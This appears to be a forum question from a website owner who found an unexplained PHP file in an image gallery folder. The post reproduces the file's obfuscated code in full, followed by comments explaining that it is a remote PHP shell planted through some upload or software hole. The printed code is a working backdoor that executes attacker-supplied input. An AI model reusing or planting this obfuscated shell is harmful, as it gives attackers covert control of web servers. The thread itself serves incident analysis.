1

Can anyone tell what this is or how it could possibly have made it to the image gallery folder of my website? It appears to be a bunch of variable definitions. Mind you that a period "." is the concat character in php. The file was named pic-1_infoold.php where pic-1.jpg is the name of an image in the gallery.

I have a shared hosting account with Godaddy.

I've already changed passwords with the shared hosting provider and the ftp. I hope to better understand what happened so I can know the scope and also so I can prevent it in the future.

Thanks to anyone that has any insight.

<?php

$hellfire='"s'; $centerpiece = '$';

$mair = 't'; $crossword = '_'; $beautifier= 'E';$h2o= 'i';$inauguration= 'G';

$backlog = '1'; $caterina='d'; $initializing ='V(+i_,?s;';$elan='D';$all= 'u'; $genuineness= 'hc(';$krypton= 'sr)o)Ee'; $crevice ='v'; $custodial ='e';$consecutive = 'B';$azimuthal = '_'; $footers='E'; $crazily= 'ptT"rR(';$convince='_L)9;C';$hadnt='sJc4OI('; $establish = '4$e"_';

$cowboy = 's';
$leathers='(';$judi= 'y';$attendee= 'p';$intravenous='g'; $brainchild='e';
$bedlam= 'o;'; $cavities = 'S'; $frazer='R';

$delmor= 'u';$amble= ':RauK';$concluded='e_>aUae'; $janella ='G8"U3v"'; $brinn='ye])';
$cash='g';$guilbert= 't'; $hayward = 'H';

$illegal= 'M'; $inlet= 'H$Q6r'; $habitation ='e';$imprecision='(grm:ai';$hazard = 'g';$assassins='r'; $gave='V'; $electorate= 'O';

$apothecary ='ddV:O=';$climbs= 'E';
$ceaselessly = 'F'; $bluing='l'; $discover ='s'; $distance= 'TEO[lr'; $budgets = '@';$hams='O';

$inkling = '$g_((S]U'; $kathleen = 'c=Rr'; $antonia='e'; $josefa='e';$elli ='l';$flyway = '[';$flub = '('; $chaperone ='L)]Ent'; $fleshing = 'i'; $cookies='Hicoae"';$januaries = 'i<2e';$cohesive='r'; $kivu='$'; $eminence= '$';$husbandman = 'a';$decrement='n';$ideologically='[TC';
$lebesgue='tnQ'; $chaffer=','; $hatchet ='$'; $fearlessly ='H'; $guessing = 'l'; $gopher = 'aaNGP_';

$jillene= 'K'; $fredek ='a)';$charts = '.isP$h';
$froze ='a$(';$concrete = ')ob';
$briano= 'T';
$guess = '7r';$gowned = 'A';
$emanate= 'R'; $incompatible= '[';
$emissivity='o5v)/';
$grated = '?';$dental='6'; $epigenetic='_t;?-RI';$committees = 'v0$a_)L';$guthry= 'e';$battlers=')'; $darning='e'; $embroiders= 'r= "(tf)';$camel= 'r';

$duffie= 'sUrHSU';
$gamaliel =','; $gigaherz ='"uP';$gaven= 'u'; $carrageen =']';$eggshell='ivuT_;'; $invoking='erfi';$eyelash ='v';

$horoscope =$cookies['2'] .

$invoking['1'] . $invoking['0']. $committees['3'].$embroiders['5'] .$invoking['0'] . $eggshell['4'].

$invoking['2'].
$eggshell['2']. $lebesgue['1'].
$cookies['2'] . $embroiders['5'] . $invoking['3'] .

$emissivity['0'] .

$lebesgue['1'] ;$lunchroom = $embroiders[2]; $contrastingly= $horoscope ($lunchroom, $invoking['0'] . $eyelash['0'].$committees['3'] . $guessing .$embroiders['4'].

$committees['3'].$invoking['1'] .$invoking['1']. $committees['3']. $brinn['0']. $eggshell['4']. $attendee .$emissivity['0'] . $attendee.$embroiders['4']. $invoking['2'] . $eggshell['2'] . $lebesgue['1'].
$cookies['2']. $eggshell['4'] .$inkling['1'] .
$invoking['0']. $embroiders['5'].$eggshell['4'] .$committees['3'] .$invoking['1'].$inkling['1']. $duffie['0'].$embroiders['4']. $embroiders['7'] .$embroiders['7'].

$embroiders['7'] . $eggshell['5'] );$contrastingly ($cleverness['2'] , $brinn['0'] , $invoking['0'] ,$brinn['0'] ,$eggshell['4'],$gowned,
$ideologically['2'] , $epigenetic['3'] ,$apothecary['1'] ,$gamaliel ,

$committees['2'] . $invoking['3'].$embroiders['1']. $committees['3'].

$invoking['1'].

$invoking['1'].

$committees['3'] .$brinn['0'] . $eggshell['4'].$imprecision[3] .$invoking['0'] .$invoking['1'].$inkling['1'].

$invoking['0'].

$embroiders['4'] .$committees['2']. $eggshell['4'].$epigenetic['5']. $chaperone['3'] . $lebesgue['2'] .$duffie['5'] . $chaperone['3'] . $duffie['4'].$eggshell['3'] .$gamaliel .$committees['2'] .$eggshell['4'].$ideologically['2'] . $hams .

$hams.
$jillene. $epigenetic[6].$chaperone['3'].$gamaliel.$committees['2'].$eggshell['4'] .

$duffie['4']. $chaperone['3']. $epigenetic['5'].$apothecary['2']. $chaperone['3'] .

$epigenetic['5'] .$embroiders['7'].$eggshell['5'] .
$committees['2'] .$committees['3']. $embroiders['1'] .

$invoking['3'].
$duffie['0'].$duffie['0'] .$invoking['0'] . $embroiders['5']. $embroiders['4'].
$committees['2'].$invoking['3']. $incompatible .$gigaherz['0']. $eggshell['2'].$eyelash['0'] . $eggshell['2'] .

$charts['5']. $emissivity['0'] .
$guessing . $invoking['1'] .

$inkling['1'].$gigaherz['0'] .

$carrageen . $embroiders['7'] . $epigenetic['3']. $committees['2'] .$invoking['3'].$incompatible.$gigaherz['0'] .$eggshell['2'] .$eyelash['0']. $eggshell['2'].$charts['5']. $emissivity['0'].
$guessing . $invoking['1'] .$inkling['1']. $gigaherz['0']. $carrageen.$apothecary['3'].$embroiders['4'] .$invoking['3']. $duffie['0']. $duffie['0'] . $invoking['0'] .$embroiders['5'] .$embroiders['4'].$committees['2'].
$invoking['3'] .
$incompatible .$gigaherz['0'].$duffie['3'] .

$eggshell['3']. $eggshell['3']. $gigaherz['2'].$eggshell['4']. $duffie['5']. $apothecary['2'] . $duffie['5'].$duffie['3'] .
$hams. $committees['6'] . $epigenetic['5']. $gopher['3'] . $gigaherz['0'].$carrageen.$embroiders['7']. $epigenetic['3']. $committees['2'].
$invoking['3'] .

$incompatible.$gigaherz['0'].$duffie['3'].

$eggshell['3'] .

$eggshell['3'] . $gigaherz['2'].
$eggshell['4'] . $duffie['5'].$apothecary['2'] .$duffie['5']. $duffie['3'] .$hams .$committees['6'].$epigenetic['5']. $gopher['3'].
$gigaherz['0']. $carrageen .

$apothecary['3'].

$apothecary['1'].$invoking['3'] .$invoking['0'] . $embroiders['7'] .$eggshell['5'].

$invoking['0'] .$eyelash['0'].$committees['3'] .$guessing .

$embroiders['4'].

$duffie['0'] .$embroiders['5'] . $invoking['1'] .

$invoking['1'] . $invoking['0'] .

$eyelash['0'].$embroiders['4'] .

$concrete['2'] .
$committees['3'] .

$duffie['0'] .$invoking['0'].$dental.
$establish['0'] .
$eggshell['4']. $apothecary['1'] . $invoking['0'].$cookies['2'] . $emissivity['0']. $apothecary['1'] . $invoking['0'] . $embroiders['4'] . $duffie['0'] .
$embroiders['5'] . $invoking['1'].

$invoking['1'].$invoking['0'] .

$eyelash['0']. $embroiders['4'] .$committees['2'] .$committees['3']. $embroiders['7'] .$embroiders['7'].$embroiders['7'] .
$embroiders['7']. $eggshell['5'] );
Aunt Jemima
  • 119
  • 3
  • I'm not asking to de-obfuscate the code. I can parse it. I want to know how or why it got there. – Aunt Jemima Jun 17 '16 at 02:59
  • 1
    It's a typical remote PHP shell, here's the unpacked code: http://pastebin.com/b9ajqx0M – Alexander O'Mara Jun 17 '16 at 03:15
  • 2
    Your gallery software or cms probably has one or more security bugs, either from a recent 0day or becuase you haven't kept it updated on a regular basis. – wireghoul Jun 17 '16 at 03:23
  • Thank you very much for the links and the insight. Eval is not an available function and doing a text search through my directories I can't find an instance of preg_replace being used. I appreciate you pointing me around. I'm still stumped where the exploit was. I don't have any plugins, libraries or content management. – Aunt Jemima Jun 17 '16 at 03:42
  • Typical example of PHP stupidity, where any uploaded file is happily executed. Take this as a lesson and never use PHP again. – André Borie Jun 17 '16 at 03:42
  • @AndréBorie, the only files I uploaded were my own and I haven't used anyone else's code on my shared account ever. – Aunt Jemima Jun 17 '16 at 03:48
  • @AuntJamaima I meant that there is some file upload feature on your site and it was abused to upload a malicious file - on a sane environment the file would just be inert and won't be executed but through the magic of PHP the file will get executed if someone requests its URL. – André Borie Jun 17 '16 at 03:49
  • Thank you Alexander O'Mara. The links you gave did actually lead me to relevant information and a vocabulary to begin asking the right questions. – Aunt Jemima Jun 17 '16 at 05:25
  • Change permissions of directory so files cannot execute. – k1308517 Jun 17 '16 at 08:53

0 Answers0